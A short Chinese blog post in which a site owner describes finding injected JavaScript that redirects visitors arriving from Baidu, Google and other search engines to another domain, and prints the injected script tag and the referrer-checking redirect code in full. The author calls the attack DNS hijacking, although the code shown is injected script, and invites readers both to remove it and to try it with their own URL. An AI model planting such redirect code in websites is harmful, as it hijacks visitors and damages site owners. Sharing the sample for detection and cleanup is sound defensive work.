有时候你可能会遇到打开一个网站而跳转到别的地方去了,今天在跟一个群里的朋友交换友链时,对方发现我的网站从百度点击进去跳到了另外一个网站.听到这个现象,我立马想到了是不是网站又让给恶意注入js代码了,因为直接在地址栏输入域名是可以正常访问的,就是通过百度搜索,再点击进去就犯病了.通过文本比较工具查看到了多出得代码如如所示:
以下是dns劫持多出来的代码网址替换成自己的网址试试就知道了。如果是自己网站被dns劫持查看出现下面得代码删除即可。
<script>document.title=’调用标题’;</script>
<script type=”text/javascript” src=”https://www.***.com/gitrez/js/raw/*ster/kf.js”></script>
下面是JS的内容,替换自己得网址即可。
var regexp = /\.(baidu|haosou|so|sogou|soso|google|*|yahoo|bing|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (regexp.test(where)) {
window.location.replace(“https://www.nanfengyl.com”);
};